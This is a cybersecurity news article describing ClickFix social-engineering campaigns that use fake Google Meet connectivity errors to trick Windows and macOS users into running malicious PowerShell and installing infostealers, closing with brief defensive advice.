HQ/EMEAFind out how we can help your business
A new ClickFix cybercriminal operation is redirecting targeted users to fake Google Meet conference landing pages displaying bogus connectivity issues. Reports revealed that this new campaign’s primary objective is to deploy information-stealing malware for Windows and macOS operating systems.
ClickFix is a social engineering tactic that emerged earlier this year. TA571 used it to send messages that included fake issues in Chrome, Word, and OneDrive. The fake issues deceived and prompted the victims to copy a PowerShell code to the clipboard, resolving difficulties when executed in Windows Command Prompt.
However, this action would result in the infection of victims’ PCs with numerous malware strains, such as DarkGate, Amadey Loader, XMRig, Matanbuchus, NetSupport, and Lumma Stealer. Researchers also monitored the sudden rise of ClickFix campaigns in July, particularly targeting US and Japan-based entities.
Separate research also noticed that ClickFix has evolved dramatically. It now includes a Google Meet lure, phishing emails targeting transport and logistics organisations, fake Facebook pages, and misleading GitHub issues.
Two cybercriminal groups executed some of the latest campaigns that utilised the tactic, thought to be sub-teams of the bitcoin scam gangs Marko Polo and CryptoLove.
The ClickFix social engineering strategy has complemented the Google Meet lure.
The ClickFix social engineering tactic has been a vital tool for threat actors that generate bogus pages for Google Meet. Hackers can target various individuals since the Google product can serve virtual meetings, webinars, and online collaboration.
An attacker would send recipients emails that appear to be official Google Meet invitations for a work meeting, conference, or other significant event. These attackers also use URLs that closely resemble actual Google Meet links.
Once the email recipient visits the bogus page, a pop-up message warns them of a technical issue. If they click the “Try Fix” button, a standard ClickFix infection procedure will initiate. Subsequently, the procedure will download a PowerShell code from the website and deploy it into the Windows prompt, infect their computer with malware, and retrieve the payload from an attacker-controlled domain.
The final payloads are infostealer viruses called Stealc or Rhadamanthys for Windows. For Mac, the attackers install the AMOS Stealer using an Apple disk image file called ‘Launcher_v194.’
Users frequently use Google Meet, especially corporate employees, and should be wary of these malicious techniques. To avoid falling victim to these attacks, verify incoming messages and contact the official software channel that delivers an issue notice.
